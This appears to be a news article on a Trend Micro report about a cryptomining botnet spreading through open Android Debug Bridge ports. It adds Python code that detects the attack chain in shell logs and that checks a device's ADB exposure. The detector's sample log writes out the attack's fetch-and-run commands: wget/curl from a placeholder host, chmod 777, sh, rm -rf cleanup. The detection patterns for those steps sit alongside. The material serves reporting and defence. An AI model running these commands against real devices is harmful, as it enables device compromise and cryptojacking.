Hackers Planting Cryptocurrency Mining Malware on Android Smartphones
Hackers are abusing open Android Debug Bridge (ADB) ports, the network interface of a client-server tool used in Android application development, to mine cryptocurrency on compromised devices. Once a device is infected, the attackers can spread the malware to connected devices via Secure Socket Shell (SSH), according to a Trend Micro report published on June 20, 2019.
Cryptojackers on Rampage
According to the latest report by cybersecurity firm Trend Micro, hackers are orchestrating cryptojacking attacks on Android devices by seeding cryptocurrency-mining botnet malware through open Android Debug Bridge (ADB) ports.
Per the researchers, open ADB ports carry no authentication mechanism by default, which makes it easy for the attackers to plant the malware and quickly spread it from the infected host to any system that previously connected to that host through SSH.
The researchers report that attacks involving the malware have been observed in 21 countries, with South Korea accounting for the highest share.
Mode of Operation
Reportedly, the hackers connect their botnet to an ADB-running device via the IP address 45[.]67[.]14[.]179. The bot then changes the system’s working directory to “/data/local/tmp” using the ADB command shell, as .tmp files typically have permission to execute by default.
After that, the botnet checks whether its host is a “honeypot” using the “uname -a” command, then downloads the corresponding cryptocurrency-mining payload with wget, or with curl if wget is not available on the infected system.
To change the file’s permissions so that the downloaded payload can execute, the bot issues the “chmod 777 a.sh” command.
Once the a.sh script has been executed on the victim’s system, the bot uses the “rm -rf a.sh*” command to remove its traces.
That’s not all: to keep its activities unnoticed by the host, the botnet malware deletes all downloaded files and payload files after it has propagated itself to other devices connected to the infected system.
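The command sequence described above is distinctive enough to detect from an ADB shell log. The following is an added example, not code from Trend Micro or from the report: it strips shell prompts from a captured session, matches each command against one regex per stage of the chain (working directory, recon, download, chmod, execution, cleanup), and flags the session only when a fetch-then-make-executable (or fetch-then-run) pair is present together with at least one more stage. The log lines and the `malicious.example` host are constructed placeholders, not indicators from the report.

```python
import re
from typing import Dict, List

# One regex per stage of the chain reported by Trend Micro. Each is applied
# to a single shell command line taken from an ADB session.
STAGES = [
    ("workdir",  re.compile(r"\bcd\s+/data/local/tmp\b")),
    ("recon",    re.compile(r"\buname\s+-a\b")),
    ("download", re.compile(r"\b(?:wget|curl)\b.*\bhttps?://")),
    ("chmod",    re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")),
    # a script launched at the start of a command or after ; & |
    ("execute",  re.compile(r"(?:^|[;&|]\s*)(?:sh\s+|bash\s+|\./)\S*\.sh\b")),
    ("cleanup",  re.compile(r"\brm\s+-[rf]{1,2}\b.*\.sh")),
]

# Prompt of the form "shell@device:/path $ "; stripped before matching.
PROMPT = re.compile(r"^\S+@\S+:\S*\s*[$#]\s+")


def commands_from_log(text: str) -> List[str]:
    """Turn a captured ADB shell transcript into a list of bare commands."""
    commands = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            commands.append(PROMPT.sub("", line, count=1))
    return commands


def analyse_session(commands: List[str]) -> Dict[str, object]:
    """Return the stages seen (label -> first line index) and a verdict."""
    seen: Dict[str, int] = {}
    for idx, cmd in enumerate(commands):
        for label, pattern in STAGES:
            if label not in seen and pattern.search(cmd):
                seen[label] = idx
    # Core of the chain: download plus making the payload executable or
    # running it. Require one more stage to cut down on noise from a dev
    # who merely fetched and ran a script of their own.
    core = "download" in seen and ("chmod" in seen or "execute" in seen)
    return {"stages": seen, "suspicious": core and len(seen) >= 3}


# Constructed transcript mirroring the chain in the article (placeholder host).
SAMPLE_LOG = """\
shell@device:/ $ cd /data/local/tmp
shell@device:/data/local/tmp $ uname -a
shell@device:/data/local/tmp $ wget http://malicious.example/a.sh || curl -O http://malicious.example/a.sh
shell@device:/data/local/tmp $ chmod 777 a.sh
shell@device:/data/local/tmp $ sh a.sh
shell@device:/data/local/tmp $ rm -rf a.sh*
"""

# Constructed benign developer session for comparison.
BENIGN_LOG = """\
shell@device:/ $ cd /data/local/tmp
shell@device:/data/local/tmp $ ls -l
shell@device:/data/local/tmp $ uname -a
shell@device:/data/local/tmp $ cat /proc/cpuinfo
"""

if __name__ == "__main__":
    for name, log in (("sample", SAMPLE_LOG), ("benign", BENIGN_LOG)):
        print(name, analyse_session(commands_from_log(log)))
```

Feeding the function a transcript collected from `adb logcat` or a honeypot's session capture works the same way; the regexes are deliberately loose about file names and URLs because only the stage order and the directory are stable across variants.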
Preventive Measures
The researchers advise Android users to regularly check and change default settings to harden their devices, to update device firmware and install patches where necessary, and to keep informed about new methods hackers employ to spread malware so that defenses can be tailored against them.
Alternatively, users of Android devices can download and install the latest version of Trend Micro Mobile Security for Android via Google Play.
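"Check and change default settings" is vague advice; the setting that matters for this campaign is whether adbd is reachable over TCP and whether it demands key authorization. The following is an added example, not code from the report or from Trend Micro, that evaluates those signals from two pieces of device output: `adb shell getprop` (the `service.adb.tcp.port`, `persist.adb.tcp.port` and `ro.adb.secure` properties) and `adb shell netstat -tln` (toybox netstat is assumed to be present). The sample outputs below are constructed.

```python
import re
from typing import Dict, List

# getprop prints "[key]: [value]" per line.
GETPROP_LINE = re.compile(r"^\[(?P<key>[^\]]+)\]:\s*\[(?P<value>[^\]]*)\]$")
# netstat -tln rows: proto recv-q send-q local-address foreign-address state
LISTEN_ROW = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+\s+LISTEN")
WILDCARD_HOSTS = ("0.0.0.0", "::", ":::")


def parse_getprop(text: str) -> Dict[str, str]:
    props: Dict[str, str] = {}
    for line in text.splitlines():
        m = GETPROP_LINE.match(line.strip())
        if m:
            props[m.group("key")] = m.group("value")
    return props


def listening_sockets(text: str) -> List[str]:
    """Local addresses of TCP listeners in netstat -tln output."""
    found = []
    for line in text.splitlines():
        m = LISTEN_ROW.match(line.strip())
        if m:
            found.append(m.group("local"))
    return found


def assess_adb_exposure(getprop_text: str, netstat_text: str) -> Dict[str, object]:
    """Combine property and socket evidence into findings and a verdict."""
    props = parse_getprop(getprop_text)
    findings: List[str] = []
    tcp_port = props.get("service.adb.tcp.port") or props.get("persist.adb.tcp.port")
    if tcp_port and tcp_port != "-1":
        findings.append(f"adbd configured for TCP on port {tcp_port}")
    for local in listening_sockets(netstat_text):
        host, _, port = local.rpartition(":")
        if port == (tcp_port or "5555") and host in WILDCARD_HOSTS:
            findings.append(f"adbd listening on all interfaces ({local})")
    # ro.adb.secure=1 makes adbd require RSA key authorization from the client.
    if props.get("ro.adb.secure", "0") != "1":
        findings.append("ro.adb.secure is not 1: ADB accepts clients without key authorization")
    remediation = ["adb usb  (switch adbd back to USB only)",
                   "turn off USB debugging in Developer options"] if findings else []
    return {"exposed": bool(findings), "findings": findings, "remediation": remediation}


# Constructed outputs for a device left in network-debugging mode.
EXPOSED_GETPROP = """\
[ro.adb.secure]: [0]
[service.adb.tcp.port]: [5555]
[sys.usb.config]: [adb]
"""
EXPOSED_NETSTAT = """\
Proto Recv-Q Send-Q Local Address          Foreign Address        State
tcp        0      0 0.0.0.0:5555           0.0.0.0:*              LISTEN
tcp        0      0 127.0.0.1:5037         0.0.0.0:*              LISTEN
"""
# Constructed outputs for a device with ADB restricted to USB and key auth on.
SAFE_GETPROP = """\
[ro.adb.secure]: [1]
[service.adb.tcp.port]: [-1]
"""
SAFE_NETSTAT = "Proto Recv-Q Send-Q Local Address          Foreign Address        State\n"

if __name__ == "__main__":
    print(assess_adb_exposure(EXPOSED_GETPROP, EXPOSED_NETSTAT))
    print(assess_adb_exposure(SAFE_GETPROP, SAFE_NETSTAT))
```

The listener check matters even when the property looks clean: a vendor image or a previous `adb tcpip 5555` can leave adbd bound to a wildcard address, and that, not the property value, is what an internet-wide scanner sees.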
As bitcoin (BTC) and altcoins keep increasing in value and use cases, cybercriminals are constantly formulating new methods of enriching themselves with ill-gotten crypto coins.
Earlier in June 2019, BTCManager reported that cybersecurity researchers had discovered a new malware family called BlackSquid, which exploits vulnerabilities in web servers, network drives, and removable drives to mine monero (XMR).